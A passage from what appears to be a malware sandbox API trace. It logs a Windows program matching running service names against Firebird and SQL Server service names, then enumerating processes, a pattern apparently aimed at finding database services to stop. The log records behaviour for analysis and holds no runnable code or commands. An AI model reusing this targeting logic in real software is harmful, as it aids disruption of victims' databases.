lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0197.302] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0197.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0197.302] lstrlenW (lpString="DcomLaunch") returned 10 [0197.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0197.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0197.302] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0197.303] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0197.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0197.303] lstrlenW (lpString="DeviceAssociationService") returned 24 [0197.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0197.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0197.303] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0197.303] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0197.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0197.303] lstrlenW (lpString="Dhcp") returned 4 [0197.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0197.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0197.303] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0197.303] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0197.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0197.303] lstrlenW (lpString="Dnscache") returned 8 [0197.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0197.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0197.303] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0197.303] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0197.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0197.303] lstrlenW (lpString="DPS") returned 3 [0197.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0197.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0197.303] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0197.303] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0197.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0197.303] lstrlenW (lpString="DusmSvc") returned 7 [0197.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0197.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0197.303] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0197.303] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0197.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0197.303] lstrlenW (lpString="EventLog") returned 8 [0197.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0197.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0197.303] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0197.304] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0197.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0197.304] lstrlenW (lpString="EventSystem") returned 11 [0197.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0197.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0197.304] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0197.304] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0197.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0197.304] lstrlenW (lpString="FontCache") returned 9 [0197.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0197.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0197.304] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0197.304] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0197.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0197.304] lstrlenW (lpString="gpsvc") returned 5 [0197.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0197.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0197.304] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0197.304] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0197.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0197.304] lstrlenW (lpString="iphlpsvc") returned 8 [0197.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0197.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0197.304] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0197.304] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0197.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0197.304] lstrlenW (lpString="KeyIso") returned 6 [0197.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0197.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0197.304] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0197.304] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0197.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0197.304] lstrlenW (lpString="LanmanServer") returned 12 [0197.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0197.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0197.305] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0197.305] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0197.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0197.305] lstrlenW (lpString="LanmanWorkstation") returned 17 [0197.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0197.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0197.305] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0197.305] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0197.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0197.305] lstrlenW (lpString="lfsvc") returned 5 [0197.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0197.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0197.305] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0197.305] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0197.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0197.305] lstrlenW (lpString="lmhosts") returned 7 [0197.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0197.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0197.305] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0197.305] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0197.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0197.305] lstrlenW (lpString="LSM") returned 3 [0197.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0197.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0197.305] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0197.305] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0197.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0197.305] lstrlenW (lpString="MpsSvc") returned 6 [0197.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0197.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0197.305] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0197.305] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0197.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0197.305] lstrlenW (lpString="NcbService") returned 10 [0197.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0197.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0197.306] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0197.306] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0197.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0197.306] lstrlenW (lpString="netprofm") returned 8 [0197.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0197.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0197.306] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0197.306] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0197.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0197.306] lstrlenW (lpString="NgcSvc") returned 6 [0197.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0197.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0197.306] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0197.306] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0197.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0197.306] lstrlenW (lpString="NlaSvc") returned 6 [0197.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0197.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0197.306] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0197.306] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0197.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0197.306] lstrlenW (lpString="nsi") returned 3 [0197.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0197.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0197.306] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0197.306] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0197.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0197.306] lstrlenW (lpString="PcaSvc") returned 6 [0197.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0197.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0197.306] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0197.306] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0197.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0197.307] lstrlenW (lpString="PlugPlay") returned 8 [0197.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0197.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0197.307] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0197.307] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0197.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0197.307] lstrlenW (lpString="Power") returned 5 [0197.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0197.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0197.307] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0197.307] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0197.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0197.307] lstrlenW (lpString="ProfSvc") returned 7 [0197.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0197.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0197.307] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0197.307] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0197.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0197.307] lstrlenW (lpString="RpcEptMapper") returned 12 [0197.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0197.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0197.307] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0197.307] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0197.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0197.307] lstrlenW (lpString="RpcSs") returned 5 [0197.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0197.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0197.307] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0197.307] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0197.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0197.307] lstrlenW (lpString="SamSs") returned 5 [0197.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0197.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0197.307] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0197.307] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0197.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0197.308] lstrlenW (lpString="Schedule") returned 8 [0197.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0197.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0197.308] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0197.308] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0197.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0197.308] lstrlenW (lpString="SecurityHealthService") returned 21 [0197.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0197.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0197.308] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0197.308] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0197.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0197.308] lstrlenW (lpString="SENS") returned 4 [0197.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0197.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0197.308] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0197.308] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0197.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0197.308] lstrlenW (lpString="ShellHWDetection") returned 16 [0197.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0197.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0197.308] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0197.308] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0197.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0197.308] lstrlenW (lpString="Spooler") returned 7 [0197.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0197.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0197.308] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0197.308] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0197.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0197.308] lstrlenW (lpString="StateRepository") returned 15 [0197.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0197.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0197.308] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0197.308] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0197.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0197.309] lstrlenW (lpString="SysMain") returned 7 [0197.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0197.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0197.309] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0197.309] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0197.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0197.309] lstrlenW (lpString="SystemEventsBroker") returned 18 [0197.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0197.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0197.309] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0197.309] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0197.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0197.309] lstrlenW (lpString="Themes") returned 6 [0197.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0197.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0197.309] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0197.309] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0197.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0197.309] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0197.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0197.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0197.309] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0197.309] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0197.309] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x380 [0197.312] Process32FirstW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.312] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0197.313] lstrlenW (lpString="System") returned 6 [0197.313] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0197.314] lstrlenW (lpString="smss.exe") returned 8 [0197.314] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.315] lstrlenW (lpString="csrss.exe") returned 9 [0197.315] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0197.315] lstrlenW (lpString="wininit.exe") returned 11 [0197.315] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.600] lstrlenW (lpString="csrss.exe") returned 9 [0197.600] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0197.601] lstrlenW (lpString="winlogon.exe") returned 12 [0197.601] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0197.602] lstrlenW (lpString="services.exe") returned 12 [0197.602] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0197.602] lstrlenW (lpString="lsass.exe") returned 9 [0197.602] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0197.603] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0197.603] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0197.604] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0197.604] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.605] lstrlenW (lpString="svchost.exe") returned 11 [0197.605] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.605] lstrlenW (lpString="svchost.exe") returned 11 [0197.605] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0197.606] lstrlenW (lpString="dwm.exe") returned 7 [0197.606] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.691] lstrlenW (lpString="svchost.exe") returned 11 [0197.691] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.692] lstrlenW (lpString="svchost.exe") returned 11 [0197.692] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.693] lstrlenW (lpString="svchost.exe") returned 11 [0197.693] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.693] lstrlenW (lpString="svchost.exe") returned 11 [0197.693] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.697] lstrlenW (lpString="svchost.exe") returned 11 [0197.697] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.698] lstrlenW (lpString="svchost.exe") returned 11 [0197.698] Process32NextW (in: hSnapshot=0x380, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, 